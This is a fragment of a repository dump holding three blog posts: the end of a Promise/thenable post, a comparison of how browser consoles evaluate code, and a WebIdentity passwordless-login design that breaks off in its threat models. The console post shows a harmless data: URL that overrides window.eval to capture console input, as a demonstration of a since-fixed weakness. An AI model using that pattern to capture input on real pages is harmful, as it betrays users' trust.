design. Here is the silly operation we did before, using Promise.\n\n Promise.resolve(\"Hello world and a good day to you all!\").then(value => {\n return new Promise(resolve => {\n wait(() => resolve(Array.prototype.map.call(value, i => i.charCodeAt(0))));\n });\n }).then(value => {\n return Promise.all(value.map(element => {\n return new Promise(resolve =>\n wait(() => resolve(String.fromCharCode(element + 1))));\n }));\n }).then(value => value.join('')\n ).then(value => ldiv(value, Math.sqrt(value.length)).join('\\n')\n ).then(alert);\n\nSure, it is a bit lengthier, especially the part where I used a `map` (which is surprisingly a use-case they looked at too, with `Promise.all`!) The absence of a callback in each `.then` does not bring anything more, and the Continuations library is essentially equivalent to the Promise library. Or so I thought.\n\nYou may notice this `return new Promise` pattern. Indeed, since there are no callbacks, whether you are chaining promises or not depends on whether what you return a Promise or not.\n\nOr so I thought. Actually, it depends on whether you return a *thenable*. What is a thenable? Something with a `.then` method. Which means the values you pass through the pipe can corrupt the pipe itself.\n\n Promise.resolve({first: ()=>1, then: ()=>5}).then(value => {\n value.first = ()=>2;\n return value;\n }).then(value => alert(JSON.stringify(value)))\n\nOops, that value is accidentally a thenable. The pipe is prematurely interrupted.\n\nAnd so I looked at last week's ECMA discussions. Behold, \"Why thenables?\" was the topic du jour! That issue annoys, but it won't go away… for compatibility reasons. The APIs of the Web were always a bit crufty. 2013 is just another year.\n\nWhile working ex-cathedra is a fun experience, I wouldn't recommend using my continuations library. The Web doesn't win because it is the best design, it wins because it is the most useful.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-12-29T19:29:00Z\",\n \"keywords\": \"js\" }\n</script>\n"
},
{
"alpha_fraction": 0.7365269660949707,
"alphanum_fraction": 0.7714186906814575,
"avg_line_length": 97.68181610107422,
"blob_id": "27d2f15483f9ec93939e14e924023abe4ba527bd",
"content_id": "4bb11eb71c3c531c278b2b10b2bf7820b49e29d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8686,
"license_type": "no_license",
"max_line_length": 769,
"num_lines": 88,
"path": "/blog/src/making-the-js-console-intuitive.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Making the JS console intuitive\n\nThe most familiar tool that DevTools put in your belt is a JavaScript console.\nAnd you know how it should work, right? Just like that Firebug console we had for so many years.\n\nExcept that most JS consoles actually suffer from what Joel Spolsky called [leaky abstraction](http://www.joelonsoftware.com/articles/LeakyAbstractions.html). Let's go through the edge-cases.\n\n**When I press ENTER**\n\nYou may wonder, what happens behind the covers, when I press Enter in the console?\n\nLet's look at *Firefox*. We have an API for [sandboxes](https://developer.mozilla.org/en-US/docs/Components.utils.Sandbox) in the browser. A sandbox has its own global object, but it is linked to what we call a compartment. For simplicity's sake, let's consider that a compartment is a web page. When we evaluate code in the sandbox, it acts just as if the page was running it, except that the page cannot access (and run code in) the sandbox itself.\n\nHowever, the duplication of global objects has undesirable side-effects.\n\n document instanceof Object // false, should be true.\n var foo = 5;\n window.foo // undefined, should be 5.\n\nThe sandbox has a distinct global object, so `var foo = 5` adds a `foo` property to its global object. However, `window` is the web page's global object, which does not see `foo`. Similarly, `document` belongs to the web page, while `Object` is attached to the sandbox.\n\nYou may think this is bad. Let me show you what *Google Chrome* [does](https://github.com/WebKit/webkit/blob/5c21b924213ce72bb53af15baca6ae31ed9542b0/Source/WebCore/inspector/InjectedScript.cpp#L70).\n\nWhat is the simplest solution you can come up with? The web page's global object already has a function to run arbitrary JavaScript. `eval()`, right? But this is a security hazard. Copy and paste this URL in your omnibar:\n\n data:text/html,<title></title><script>window.eval = function (e) { console.log('sending ' + e + ' to a malicious website!'); };</script>\n\n(Don't worry, it isn't really malicious). Open the JS console, type something in.\n\nWhy do you get everything you enter sent to a malicious website (not really)? Because the web page redefines `eval()` to be whatever they want, along their sinister agenda.\n\n(This has been [filed](https://bugs.webkit.org/show_bug.cgi?id=96559), and it has been fixed in Chromium.)\n\nI have to say, *Opera*'s implementation seems spotless. None of the issues raised above are to be found. They [call](https://github.com/operasoftware/dragonfly/blob/master/src/repl/repl_service.js#L419) an `Eval` binding which is documented [here](http://operasoftware.github.com/scope-interface/EcmascriptDebugger.6.14.html#Eval), and which takes care of all possibilities (running the code in the stack frame when the debugger is on a breakpoint, etc.) without getting disturbed if the web page modifies the `eval()` function. Magic!\n\n**Special cases ($0 and friends)**\n\nThe set of all special variables and functions you get in the JS console is what Firebug calls the Command Line API.\nIt has [some kind of spec](http://getfirebug.com/wiki/index.php/Command_Line_API). It is a plain simple documentation of their behaviour, written in Fall 2009. When Google Chrome started their own DevTools, they copied a lot of the behaviour that Firebug had, and the same goes for Opera Dragonfly. Thus far, that spec has been very uncontroversial.\n\nOnly recently did Paul Irish suggest changing `$()` from the old `document.getElementById` (inherited from prototype.js) [to](https://docs.google.com/spreadsheet/viewform?formkey=dHA5RjFzbF9tcElCa3VXYm13ZTctdkE6MQ) [a](https://bugzilla.mozilla.org/show_bug.cgi?id=778732) [more](https://bugs.webkit.org/show_bug.cgi?id=92648) [intuitive](https://plus.google.com/113127438179392830442/posts/Bo1zdF4X9mp) (jQuery-inspired) `document.querySelector`. Everybody liked the idea, it got re-implemented everywhere (I contributed the Opera Dragonfly [change](https://github.com/operasoftware/dragonfly/pull/53)).\n\n*Opera* calls them [Host commands](https://github.com/operasoftware/dragonfly/blob/cf46806f747067825c66142a6869c54b36f17d68/src/repl/commandtransformer.js#L237). As you can tell from looking at their code, they replace the matched token that their parser gives them with a string of JS code.\nFor example, `$` is first parsed as a token, which is replaced on the fly with `\"(typeof $ == 'function' && $ || function(e) { return document.getElementById(e); })\"`. Then, all tokens get concatenated, and evaluated. The simplest monkey-patching can do the trick.\n\n(They even take care of recursive commands, by re-flowing the post-processed code through their tokenizer, although I don't believe they actually use recursive host commands!)\n\nWhile Opera's host commands operate just like pre-processor macros, *Firefox*, on the other hand, injects [all those special functions](http://hg.mozilla.org/integration/fx-team/file/5650196a8c7d/browser/devtools/webconsole/HUDService-content.js#l518) in [the sandbox' global object](http://hg.mozilla.org/integration/fx-team/file/5650196a8c7d/browser/devtools/webconsole/HUDService-content.js#l1005).\n\nFinally, *WebKit* has the most infamous solution of all. You can easily notice that, upon entering the following code in the console, as you may have noticed while trying the \"malicious\" web page:\n\n (function() { debugger; }())\n\n… a new script called `(program)` will pop up in the debugger and show [the following content](https://github.com/WebKit/webkit/blob/5c21b924213ce72bb53af15baca6ae31ed9542b0/Source/WebCore/inspector/InjectedScriptSource.js#L448):\n\n with ((window && window.console && window.console._commandLineAPI) || {}) {\n (function() { debugger; }())\n }\n\nYou can probably guess what `window.console._commandLineAPI` contains. It's an object that maps identifiers like `$` and `$$` to defined functions. Evaluating `console._commandLineAPI.$.toString()` yields \"function () { [native code] }\": yep, all those functions are native, all written in C++.\n\nWe don't really see a performance impact from the use of the with statement, but injecting all window variables, console variables, and the command line API, using this frown-upon construct, feels wrong in some subconscious way.\n\n*Firebug* [defines real functions](https://github.com/firebug/firebug/blob/af1d74102de2cd2f2f9202f18d1d4c02439aa16a/extension/content/firebug/console/commandLine.js#L1050), and then tries to do [the right thing](https://github.com/firebug/firebug/blob/af1d74102de2cd2f2f9202f18d1d4c02439aa16a/extension/content/firebug/console/commandLine.js#L274), inserting the API [into the JS frame](https://github.com/firebug/firebug/blob/af1d74102de2cd2f2f9202f18d1d4c02439aa16a/extension/content/firebug/console/commandLine.js#L274) if available, but [it ends up not doing anything with it](https://github.com/firebug/firebug/blob/master/extension/content/firebug/js/debugger.js#L84), which explains why you don't get to use `$` and friends in the console, while on a breakpoint.\n\nThe backup plan [will sound familiar](https://github.com/firebug/firebug/blob/af1d74102de2cd2f2f9202f18d1d4c02439aa16a/extension/content/firebug/console/commandLine.js#L180).\n\n expr = \"with(_FirebugCommandLine){\\n\" + expr + \"\\n};\";\n\n\n**Future changes**\n\nIn order to erase the issues I talk about in Firefox' WebConsole, we are working on a tighter integration with our Debugger. You can read all about it on [this lengthy thread](https://bugzilla.mozilla.org/show_bug.cgi?id=774753). The basic idea is, instead of a sandbox, use the debugger to run code dynamically, while adding bindings (the command line API) that are not accessible from the web page. Shout out to Jim Blandy for adding [this functionality](https://bugzilla.mozilla.org/show_bug.cgi?id=785174) to the Debugger recently.\n\nObviously, there is more work to be done. We are careful about not making this change cause performance regressions, or security problems. No rush, but we are on the right path!\n\n**Wrapping up**\n\nWe arrive at the end of our journey. All in all, tool developers have proven very ingenious, twisting every part of the JS language to meld it to their needs. However, the resulting disparate toolboxes can have rough, incompatible edges (think Opera's host commands, `$` and `$$` for example, which cannot be used as function references).\n\nYet, this is one of the most functional cross-browser API that I ever saw. The magic happens by discussing your implementation with fellow tool hackers. Thank you Internet!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2012-09-12T23:20:00Z\",\n \"keywords\": \"js\" }\n</script>\n"
},
{
"alpha_fraction": 0.7623023986816406,
"alphanum_fraction": 0.7726215124130249,
"avg_line_length": 56.71084213256836,
"blob_id": "121e68c26bd0a9d7f282654ef067b357eeb3fd02",
"content_id": "38e41caa39fdc5096e0cb0677d9db2e9d3dc2932",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 33676,
"license_type": "no_license",
"max_line_length": 945,
"num_lines": 581,
"path": "/blog/src/webidentity.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# WebIdentity: One-click passwordless signups & logins\n\nI talked about [best-practices for password-based logins last time][MemorablePasswords],\nand gave tools to help you follow them.\n\nPassword managers (and generators) must become prevalent.\nThankfully, it is becoming a reality: beyond services such as 1password or Dashlane,\nbrowsers themselves now offer those features built-in.\nIt sprouted from the bookmark sync feature, became password sync,\nand now has suggested random passwords.\n\nBut **passwords are inherently flawed** as a security user experience.\nHonestly, they slow down both registration to a new service, and logins.\nIt annoys users, allows terrible security practices, and \nloses businesses billions yearly, both on users that give up,\nand reputation from security issues.\n\nThere is a high cost to websites to implement and maintain security practices\naround password storage.\nBy the way, this is the most significant example of “roll your own crypto”,\nas each website defines its own authentication protocol.\n\nThere is also a cost for browsers: maintaining a list of passwords,\none for each website, makes for a fairly large total storage.\nA significant, pernicious consequence is the emergence of siloes,\nencouraging browser monopolies:\nwhy would I switch browsers, when it is so hard to copy all those passwords over?\n\nMy hope for the future of authentication:\n\n- Become so seamless that **both signing up and logging in is a single click**.\n- We want that improved UX, not just with the same security level that we have now, but a much better one.\n - An attacker that got its hands on a fresh plaintext copy of the website’s database and secrets should be unable to authenticate on behalf of users.\n - Even if someone can decrypt traffic on-the-fly, from seeing the authentication information, they also can’t impersonate the user for more than 30 seconds afterwards.\n - Even with both a full-on breach of the website’s servers *and* on-the-fly traffic decryption, they cannot sign up nor log in as you.\n- And, cherry on top, we want to do so in such a way that *exporting identities between browsers and devices is extremely easy*.\n\nI called this new scheme **WebIdentity**.\n\n## The place of WebAuthn\n\nYour mind may be itching to yell: “WebAuthn!”\nSo, before digging into the gritty details of WebIdentity,\nlet’s talk about the awesomeness that is WebAuthn.\n\n[WebAuthn][] is an authentication scheme that relies on public-key cryptography.\n\nA phenomenal advantage of WebAuthn over WebIdentity is\nin the ability to leverage a wide range of different security devices\n(Yubico, TouchID, Windows Hello, and so many more).\nIn short, it is *absolutely amazing* at second-factor authentication (2FA),\nwhich is completely outside the scope of WebIdentity and would complement it beautifully.\n\nHowever, WebAuthn has severe disadvantages for use as main authentication,\nwhich WebIdentity solves wonderfully.\nBetting on WebAuthn as the main sign-up and log-in system\nrisks significantly delaying the wide adoption\nof passwordless authentication on the Web:\n\n- Websites do not implement it because:\n - on the backend, it requires them to implement a PKI, which is an endeavor.\n Multiple public keys can map to the same user, and management of the keys\n (and of the certificate validation upon sign-up, when necessary) needs proper handling.\n - on the front-end, it requires subtle cryptography to handle the challenge handshake,\n that needs to be implemented not just for the Web, but for iOS and Android apps.\n With WebIdentity, there is no front-end change at all.\n- **Feature detection** is involved. Both the front-end and the backend must know\n that the user can do WebAuthn on that device, and ideally, the backend stores it\n on secure httpOnly cookies. It also must store the list of credential IDs:\n there could be multiple users on the same device.\n WebIdentity relies on the user management feature already built into the browser’s Sync.\n- For websites, it requires a **database access** for each authentication.\n That contributes to a requirement to only use WebAuthn for login, not session authentication.\n WebIdentity does both in one fell swoop, and database interaction is only needed for sign-ups and logins.\n- More damningly, the protocol requires a back-and-forth;\n in other words, it cannot be used directly for all HTTP requests.\n It needs a separate, **unspecified session key management scheme** such as JWT.\n With WebIdentity, the user authentication scheme is indistinguishable from\n the session authentication scheme.\n- Most damningly, **exporting the public/private key pairs between browsers** was not part of the design process.\n In fact, synchronizing those keys (some of which can change) between browsers is a complex operation.\n It goes so far that the [official recommendation from browser makers][Apple] is to never have WebAuthn log-in\n be the only log-in mechanism, because private keys are tied to the device.\n Changing (or losing) devices require logging in through another means.\n Thus, it is only a faster log-in process (click login, select identity, accept request, enter biometrics or press Yubikey button)\n than passwords, but passwords remain the main log-in weak link that won’t die.\n Meanwhile, WebIdentity has a faster log-in still (there is literally just the click login step),\n and can fully replace passwords.\n- To roll it out slowly, it started being **used only as 2FA**.\n It is now usually tied to things like Yubikey in the UX,\n and seems doomed to remain only used for 2FA,\n as a consequence of everything listed above.\n- WebAuthn suffers from **crypto-agility**, similar to JWT where it caused security faults.\n In WebIdentity, algorithms are set for each version,\n and version changes are only performed when the previous algorithm is broken.\n Since there is really only one cryptographic algorithm, it is easy to keep track of.\n- In the same vein, it is easy for a service operator to **misuse** WebAuthn,\n and end up losing major security protections. There are many subtle traps.\n For instance, they may generate challenges with a poor random source,\n or forget to validate some metadata field received.\n- Where is the **NFC antenna** on this phone?\n- Public-key cryptography is currently at risk from **quantum computing** advances,\n whereas WebIdentity relies on primitives that are essentially [quantum-resistant][].\n\nAll in all, WebAuthn is harder for website operators to put in place than passwords,\nwhile WebIdentity is simpler.\n(Although they would only do so once all major evergreen browsers implement it.)\n\nThe status quo: despite browsers’ efforts to add support not just for Yubikeys but also TouchID,\nwebsite owners are very shy in implementing support even just for 2FA,\nin part because of the implementation complexity,\nand the user experience is frustrating enough currently that few actually use it.\nI do not know any independent commercial website\nthat uses WebAuthn as its primary log-in system, instead of passwords.\n\nWebIdentity can quickly replace password authentication with a much simpler system,\nboth for users, website operators, and browsers;\nwhile WebAuthn is likely to have a slow, 10-year adoption across websites.\n\nHowever, WebIdentity does not replace WebAuthn!\nWebAuthn is still extremely valuable as 2FA,\nwhich should really be used on all sensitive actions on the website.\n\n## Initialization\n\nFirst, the browser stores a single random 256-bit secret for each user,\ncalled the **Browser Key (BK)**,\nsynchronized across all devices through its Sync feature.\nThat key never leaves the browser’s Sync servers.\n\nEach website keeps around a random 256-bit secret key (**Website Key, WK**)\nidentified by a **key ID (KID)**,\ntypically a number incremented every time the key needs to change,\nwhich should be rare, eg. yearly.\nIt must be generated by a CSPRNG, for instance from /dev/urandom.\n\n## Sign-Up\n\nWhen going on a page, the website advertizes that it supports WebIdentity\nby delivering this header (even on 200 status results):\n\n WWW-Authenticate: Identity v1\n\nUpon seeing it, the browser displays a “Log in” button *in its chrome*\n(above the [line of death][], thus not in the webpage),\nif the website uses TLS and HSTS.\n\nWhen the user clicks it, from then on, for all HTTPS requests to that website,\nthe browser will authenticate the user to the website,\nand display a “Log out” button instead of the “Log in” one.\n\nBut first, there is a tiny sign-up handshake.\nFirst, the browser computes the **User’s Website Key (UWK)** as the MAC\nof the effective Top-Level Domain [eTLD+1][PublicSuffix]:\nit is unique for each entity that has control over a given cookie space,\nand incidentally will also soon be [the only URL part shown][RegistrableDomain] (to fight phishing).\nSo the security UX will be consistent for identity and website trust here.\nThe UWK MAC is keyed with BK, the user’s Sync secret kept by the browser.\nThe UWK is a *secret that the browser has for each user and each website*.\nIt is never stored and only transmitted between the browser’s Sync servers\nand the user’s browser upon sign-up and login.\n\nThen, the browser takes a MAC of the ASCII string “AUID”, keyed with UWK:\nthis becomes the **Authentication User ID (AUID)**\nwhich will *identify the user in each HTTP request*.\nEavesdropper cannot find the UWK from it, which is good,\nsince it is only used for very rare, sensitive operations.\n\nFinally, the browser picks a **Log-In Date (LID)** to send as an HTTP header,\nand computes its MAC, keyed with the User’s Website Key (UWK).\nThe result is the **Log-In Proof token (LIP)**,\na piece of information kept secret by the browser,\nwhich will be later revealed to the website when logging back in,\nto strongly prove that the initiator is the initial user.\n\nAside: as you can imagine, there will be a whole tree of hashes,\neach with a different purpose and name.\nTo help you follow along, here is a picture of the entire tree:\n\n\n\nThe browser reloads the page with the Date header set to the LID,\nand the following new header\n(all in one line, with spaces instead of newlines; the newlines are for readability):\n\n Authorization: Identity v1 SignUp\n auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n liv=\"7deoyUWH9wk-x15mb-vr7i57rU0VojDLwc99EjtKUlUK\"\n\n- `Identity` indicates that it uses this authorization scheme.\n- `v1` is the version of the scheme; it likely would change very rarely, typically when the hash function gets broken.\n- `SignUp` is the action: here, we sign up as a new user.\n- `VzX3…` is the Authentication User ID (AUID), which the website will rely on to identify the user.\n- `7deo…` is the **Log-In Verification token (LIV)**,\n a MAC of the AUID keyed with the Log-In Proof token (LIP).\n- The LID is sent in the Date header so that the website can store it.\n\nThe website cannot guess the LIP, nor can any eavesdropper,\nwhich is good, since the LIP will be used to prove knowledge of BK\nfor rare, sensitive updates.\n\nThe website identifies the user from the AUID (indirectly),\nbut it cannot guess the user’s AUID for another website.\nBesides, two websites cannot know that their respective AUIDs correspond to the same user\nwithout seriously endangering the security of their own authentication.\nThat protects the user’s privacy across websites.\n\nUpon receiving a SignUp request,\nthe website takes a MAC of the AUID, keyed with WK (the website’s secret key).\nThat is the **Website’s User Key (WUK)**, a secret kept by the website, unique to a user.\nIt is roughly the opposite of the User’s Website Key (UWK).\nThe user cannot know the website’s other users’ WUK,\nsince it would need both their BK and the WK to do so.\n\nThen, the website computes the **User ID (UID)** as the MAC of the AUID\nkeyed with its Website’s User Key (WUK).\nThe UID will be stored in database, etc.\nIntruders cannot find the AUID nor the WUK from read-only access to the database,\npreventing them from crafting fake authenticated requests.\n\nThen it does the following:\n\n1. It verifies that the LID is within one minute of its known date. If not, the sign-up is denied.\n2. It stores in database the UID, the LID, and the LIV, likely with a mapping to its internal user identifier.\n In our example, the UID is `XvP5sxmrh8UmpgYqJ9OmKs9HqhxcdS5-lUxlaEuhBc4`.\n\nThen, the website prepares a response.\n\nFirst, it constructs the **Log-In Shared Key (LISK)**\nas the MAC of the Log-In Date (LID) keyed with the Website’s User Key (WUK).\nThat key will be *shared between the website and the browser* for one hour,\nand will be used to compute a TOTP.\n\nIf the website sees that the user was already signed up,\nit will accept it, but with slight differences in the response\nthat are discussed in the Log In section.\nOtherwise, it returns a page with the following header:\n\n WWW-Authenticate: Identity v1 Key\n kid=\"2020\"\n auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n lisk=\"Ii6JLfnbWJgcy0WtworWKRIlJIPSGkQwSAvBtQM1OEgK\"\n\n- `Key` is the action instructing the browser to store the website’s key.\n- `2020` is the KID, placed first to ease inspection.\n- `VzX3…` is the AUID, identifying the user in all future requests.\n- `Ii6J…` is the LISK, which will be used to prove that the user is who they claim to be for one hour.\n\n(The website can also send identifying data,\nsuch as its internal ID (eg. a username or its database’s generated `user_id`),\nin a payload encrypted with the WUK as key,\nin the Cookies header, ideally Secure and httpOnly.\nThat lets it avoid a database fetch when it relies on an internally-produced ID\ninstead of the UID provided by WebIdentity.\nThat part is outside the definition of WebIdentity, however.)\n\nThe browser stores the version (v1), the KID, the LID and the LISK in its Sync feature.\n\n## Authentication\n\nOn each HTTP request while logged in, the browser sends the AUID,\nalong with a MAC of the Date HTTP header keyed with the LISK:\n\n Authorization: Identity v1 Auth\n kid=\"2020\"\n auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n lid=\"Fri, 03 Jul 2020 10:11:22 GMT\"\n totp=\"YrrliECBpS34lKob4xMOIKgM5zw8_zxMsBBleIIfGHIK\"\n\n- `Auth` is the action to authenticate the request.\n- `2020` is the KID in use.\n- `VzX3…` is the AUID, as returned from the SignUp response.\n- The Log-In Date (LID) lets the website compute the LISK.\n- `Yrrl…` is the **Time-based One-Time Password (TOTP)**:\n the MAC of the Date (`Fri, 03 Jul 2020 14:32:19 GMT`), keyed with the LISK.\n\nWhen receiving an Auth request, the website must:\n\n1. Verify that the Date sent is within one minute of the accurate date. The request is denied otherwise.\n2. Verify that the Log-In Date (LID) is not more than one hour old.\n The request is denied otherwise: the browser always knows to make a LogIn request (seen below) instead.\n (Note that it does not matter if the LID does not match the stored LID.\n That way, multiple browsers can share the same BK and still authenticate in parallel.)\n3. Compute the MAC of the request’s AUID, keyed with the WK. That is the WUK.\n4. Compute the MAC of the LID, keyed with the WUK. That is the LISK.\n5. Compute the MAC of the Date, keyed with the LISK. Verify that it matches the TOTP. The request is denied otherwise.\n6. Compute the MAC of the request’s AUID, keyed with the WUK: that is the UID, which can be used for application purposes.\n\nNote that this computation does not require database access, and is quite efficient in software.\n\nThe explanation of the main principle of operation is already finished.\nLet’s look at a few events that may occur,\nranging in order from uncommon (monthly?) to extremely rare (every 20 years?).\n\n### Log Out\n\nWhen logged in, the browser’s Log In button changes to a Log out button.\n\nWhen clicking the Log out button,\nthe browser deletes the protocol version, KID, AUID and LISK in Sync;\nand no longer sends Authorization headers.\n\nThe browser logs out and logs back in automatically every hour,\nto ensure it does not use the same LISK for too long.\nBecause of the way log-outs and log-ins work,\nthis is entirely seamless and invisible to the user.\n\n### Log In\n\nWhen the browser tries to log in, in fact, it starts by simply doing the sign-up procedure.\n\nThe website detects that a sign-up already occured, and initiates the login procedure:\n\n WWW-Authenticate: Identity v1 LogIn\n lid=\"Fri, 03 Jul 2020 10:11:22 GMT\"\n\nYou can find after the LogIn keyword, the Log-In Date (LID) that the website registered for this UID.\n\nThe browser’s Sync server computes the User’s Website Key\n(UWK, a MAC of the eTLD+1 keyed with BK),\nand keys with it a MAC of that LID.\nThat gives it the Log-In Proof (LIP) that was created during sign-up.\n\nJust as with a normal sign-up,\nthe browser picks a new **Log-In Date (LID)** to send as an HTTP header,\nand computes its MAC, keyed with the User’s Website Key (UWK).\nThe result is a brand-new **Log-In Proof (LIP)**.\n(In our example, the new LID is `Fri, 03 Jul 2020 15:27:43 GMT`.)\n\nIt then sends a LogIn request,\nwhich is essentially identical to the SignUp request, but with the new LIV:\n\n Authorization: Identity v1 LogIn\n auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n olip=\"8x8HgKzEl5nok-JNwT2PCiwnfwrCD2rOxtMTUotU4hgK\"\n liv=\"S4GFp0Xh8rSeV9-VgpNTCW2iDPd36sABZrGPqwj8oJkK\"\n\n- `VzX3…` is the Authentication User ID (AUID).\n- `8x8H…` is the old Log-In Proof (LIP).\n- `S4GF…`, is a new **Log-In Verification token (LIV)**,\n a MAC of the AUID keyed with the Log-In Proof (LIP).\n- The LID is sent in the Date header, so that the website can store it.\n\nThe website constructs the WUK as the MAC of the AUID keyed with its WK,\nand gets the UID as the MAC of the AUID keyed with the WUK.\nThen it validates the following:\n\n1. The LID must be within one minute of its known date.\n2. The old LIV must be the one associated with this UID as stored in database.\n3. Computing the MAC of the AUID keyed with the old LIP transmitted in the request,\n yields the old LIV stored in database.\n\nIf the validation fails, the LogIn request is denied.\nThen, if both validated OK, it updates in database the sign-up Date and the new LIV.\n\nYou may notice that neither the website,\nnor any eavesdropper with full read access to the website,\ncould guess the LIP until they see it in the Log In request.\nThus, they could not perform a Log In request;\nand when they see it in the HTTPS payload, it is too late to take advantage of it,\nas the LIV is updated with a new one for which they don’t have the LIP.\n\nThe rest goes exactly like a Sign Up:\n\n WWW-Authenticate: Identity v1 Key\n kid=\"2020\"\n auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n lisk=\"zhgoQXVsATIUd-S2mB1gUlKi5yj_iO7K7KrsI_H8rBEK\"\n\n- `Key` is the action instructing the browser to store the website’s key.\n- `2020` is the KID, placed first to ease inspection.\n- `VzX3…` is the AUID, identifying the user in all future requests.\n- `zhgo…` is the Log-In Shared Key (LISK), which will be used to prove that the user is who they claim to be.\n\nThe browser stores the version (v1), the KID, the new LID and the LISK in its Sync feature.\n\n### Website key update\n\nIf the website worries its key may be compromised, it will rekey.\nHowever, it must keep all past keys, and accept all of them,\nso that users can authenticate even years after the last request.\n\n(The main point of rekeying is to migrate users to a key\nthat is not compromised, such that they don’t run the risk of being\nimpersonated if the website has futher severe security failures.)\n\nOnce rekeyed, when the website receives an Auth request with an old key,\nit authenticates the request with the corresponding key and accepts the request,\nbut responds with a new Key action, similar to a sign-up:\n\n WWW-Authenticate: Identity v1 Key\n kid=\"2021\"\n auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n lisk=\"zhgoQXVsATIUd-S2mB1gUlKi5yj_iO7K7KrsI_H8rBEK\"\n\nWhen receiving this, the browser updates its KID and LISK in its Sync storage for the website.\nIt then uses the new LISK on future authentications.\n\nAs long as the website only performs the rekeying after they regained full access\nand ensured that their TLS connections were not (or no longer) compromised,\nthis sensitive transmission of a LISK should not be eavesdropped.\nAfter rekeying, they can therefore safely communicate to all customers\nthe need to log out and log back in.\n\n### Browser export\n\nBrowsers must provide a way to export the Browser Key to another browser.\nIt is recommended that the browser export format be encrypted with the user’s master password.\nAdditionally, any export event should be authenticated with a second factor.\n\nFrom just the BK, the new browser can perform the Log In procedure on all websites.\n\n### Account takeover or Browser Sync breach\n\nWhen a user’s BK is leaked, the website owner (if customer service detects an account takeover)\nor browser (in the case of a breach of their Sync service)\nwill instruct the user to trigger the **Browser Key Reset procedure**.\n\nThe browser must have a button in its UI (for instance, in the Sync Preferences page) triggering the procedure:\n\nFirst, it will create a new BK (say, `0dP_ocrzSwieAuLUNCD6P660HLLOGl9zyfxYwdSLI0kK`),\nbut keep the old BK around.\n\nThen, for each website for which the user has a LISK associated to the old BK,\nthe browser will make a ReSignUp request, very similar to a LogIn request:\n\n Authorization: Identity v1 ReSignUp v1\n oauid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n olip=\"R05PEuFZHCngevxsxJZsIDeJe66IDGYqoH3JBVtT-DcK\"\n auid=\"yFvfOjHW68qyhMIPobZdL6oZmIIOD7aEVquwkkbbxS4\"\n liv=\"yWPeXDGFi3q8ZAwVOAvbv5swl6oVoOScw7Y3CDVPQCM\"\n\n- `ReSignUp` is a new action to instruct the website to reset the UIDs everywhere where it matters, and provide a new LISK.\n- `v1` means that the protocol used for the old IDs and tokens is v1. This is useful for the “Hash function theoretically broken” section.\n- `VzX3…` is the old Authentication User ID (AUID).\n- `R05P…` is the old Log-In Proof (LIP).\n- `yFvf…` is a new Authentication User ID (AUID).\n- `yWPe…`, is a new Log-In Verification token (LIV),\n a MAC of the new AUID keyed with the new Log-In Proof (LIP).\n- The new LID is sent in the Date header (`Fri, 03 Jul 2020 16:03:26 GMT`).\n\nThe website treats it just like a LogIn request, except it also updates the UID in database.\n\nA Browser Sync breach would obviously be a major event.\nIn the old password world, it is equivalent to\nhaving the worldwide Google Chrome passwords leaked. It would cause all Chrome users\nto need to reset their passwords one by one on every website.\n\nThankfully, with WebIdentity, this can be automated by the browser seamlessly.\n\nFirst, the browser will need to close the breach.\nThen, for each user, it will automatically trigger the Browser Key Reset procedure remotely.\n\nObviously, just as with a Google Chrome password leak,\nadversaries could take control of user accounts by doing a ReSignUp on their behalf.\nWebIdentity is better in this respect: the browsers can automatically update information,\nleaving a small window for attackers to take over accounts;\nwhile a password leak may have users that take years to update a given password.\n\nJust as with passwords, it is recommended that browsers implement Sync\nin such a way that the user decypts Sync secrets on their machine\nthrough the use of a master password.\nAs a result, the Sync servers would only contain encrypted data without the key.\nObviously, even a leak of the mere encrypted data should trigger a ReSignUp,\nbut at least the risk of user account takeover would be greatly reduced.\n\n### Hash function theoretically broken\n\nIt took ten years from SHA-1 publication to full-round collisions.\nWhile SHA-2 has already survived twenty,\nit is plausible that it gets eventually broken theoretically.\nThat was the motivation for the SHA-3 process,\nwhich yielded a primitive seemingly likely to take even more time\nthan SHA-2 to get broken, thanks to its sponge construction.\n\nWhen SHA-2 gets theoretically broken,\nwe will release v2 of the protocol.\nBrowser vendors and website operators will need to implement it\nbefore it gets practically broken\n(which for SHA-1 took ten years).\n\nWebsites supporting v2 must also support v1 for at least ten years,\nwhich ought to be enough time for browser vendors to implement v2.\n\nWhen browsers only support v1, and see support for v2 from a website,\nthey must send v1 requests, and the website must follow the v1 protocol.\n\nWhen browsers implement v2 and hold a v1 authentication AUID/LISK,\nthey must follow the Browser Key Reset procedure.\n\n### Threat models\n\n- Website attack:\n - From a third party:\n - **Replay attack**: If they replay the encrypted request of an authenticated user within the 30-second window, they may trigger the corresponding action (eg. a bank transfer) twice. We recommend that websites implement idempotency checks, as this could also happen from network glitches.\n - If they get **read access to the website** database, the UID gives no information that can be used to authenticate on behalf of the user.\n - If they also compromise WK, the **website key**, they still lack the AUID (which is not stored) to be able to do anything.\n - If they compromise the **website’s TLS encryption**, such as with the [CloudFlare memory leak][], they can read the encrypted payloads between the user and the website.\n - Reading the requests gives them a valid AUID/LID/TOTP set, but they only have a 30-second window (1 minute in rare worst-case clock drifts) to perform authenticated requests on behalf of the user, as they lack the LISK to be able to MAC new dates. They cannot issue a LogIn or ReSignUp request, 